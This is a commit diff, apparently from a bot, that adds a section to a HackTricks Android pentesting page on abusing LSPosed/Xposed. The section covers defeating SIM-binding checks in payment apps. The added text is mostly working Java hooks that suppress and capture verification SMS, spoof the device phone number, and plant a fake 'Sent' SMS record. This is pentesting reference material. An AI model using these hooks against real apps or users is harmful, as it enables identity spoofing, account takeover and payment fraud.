Add content from: Weaponizing LSPosed: Remote SMS Injection and Identity Spoof...

HackTricks News Bot · HackTricks News Bot · commit 39e0d0dd0cc9 · 2026-03-19T13:06:19.000Z
diff --git a/src/mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.md b/src/mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.md
@@ -334,6 +334,69 @@ apk-mitm app.apk
   install-burp-certificate.md
   {{#endref}}
 
+
+## LSPosed/Xposed Hooking Abuse (Telephony/SMS)
+
+On rooted devices, LSPosed/Xposed modules can hook Java telephony/SMS APIs at runtime, keeping the APK unmodified on disk while fully controlling what the app sees. This is commonly abused to bypass SIM‑binding flows that trust local telephony APIs or local SMS provider state.
+
+Key primitives
+- **Suppress outgoing verification SMS** while exfiltrating the token by short‑circuiting `SmsManager.sendTextMessage` in `beforeHookedMethod`.
+- **Spoof MSISDN/line number** by forcing `TelephonyManager.getLine1Number()` and `SubscriptionInfo.getNumber()` to return an attacker‑controlled value.
+- **Plant a fake “Sent” record** in the SMS provider so apps that check local SMS history see a successful send even if the carrier never received it.
+
+Example: block SMS dispatch and capture content
+```java
+XposedHelpers.findAndHookMethod(
+  "android.telephony.SmsManager",
+  lpparam.classLoader,
+  "sendTextMessage",
+  String.class, String.class, String.class, PendingIntent.class, PendingIntent.class,
+  new XC_MethodHook() {
+    protected void beforeHookedMethod(MethodHookParam param) {
+      String body = (String) param.args[2];
+      // exfiltrate body to operator channel
+      param.setResult(null); // suppress real SMS send
+    }
+  }
+);
+```
+
+Example: spoof device phone number
+```java
+XposedHelpers.findAndHookMethod(
+  "android.telephony.TelephonyManager",
+  lpparam.classLoader,
+  "getLine1Number",
+  new XC_MethodHook() {
+    protected void afterHookedMethod(MethodHookParam param) {
+      param.setResult(spoofedMsisdn);
+    }
+  }
+);
+```
+```java
+XposedHelpers.findAndHookMethod(
+  "android.telephony.SubscriptionInfo",
+  lpparam.classLoader,
+  "getNumber",
+  new XC_MethodHook() {
+    protected void afterHookedMethod(MethodHookParam param) {
+      param.setResult(spoofedMsisdn);
+    }
+  }
+);
+```
+
+Example: inject a fake “Sent” SMS record
+```java
+ContentValues v = new ContentValues();
+v.put("address", dest);
+v.put("body", body);
+v.put("type", 2);   // sent
+v.put("status", 0); // success
+context.getContentResolver().insert(Uri.parse("content://sms/sent"), v);
+```
+
 ## Handy command cheat‑sheet
 
 ```bash
@@ -396,5 +459,5 @@ Notes
 - [phantom-frida (stealth Frida server builder)](https://github.com/TheQmaks/phantom-frida)
 - [Frida OkHttp4 SSL pinning bypass script](https://github.com/Zero3141/Frida-OkHttp-Bypass)
 - [XDA guide to strong Play Integrity bypass (2025)](https://xdaforums.com/t/updated-11-17-2025-guide-get-strong-integrity-fix-banking-apps-revolut-google-wallet-android-16-working.4753805/)
-
+- [Weaponizing LSPosed: Remote SMS Injection and Identity Spoofing in Modern Payment Ecosystems](https://www.cloudsek.com/blog/weaponizing-lsposed-remote-sms-injection-and-identity-spoofing-in-modern-payment-ecosystems-2)
 {{#include ../../banners/hacktricks-training.md}}
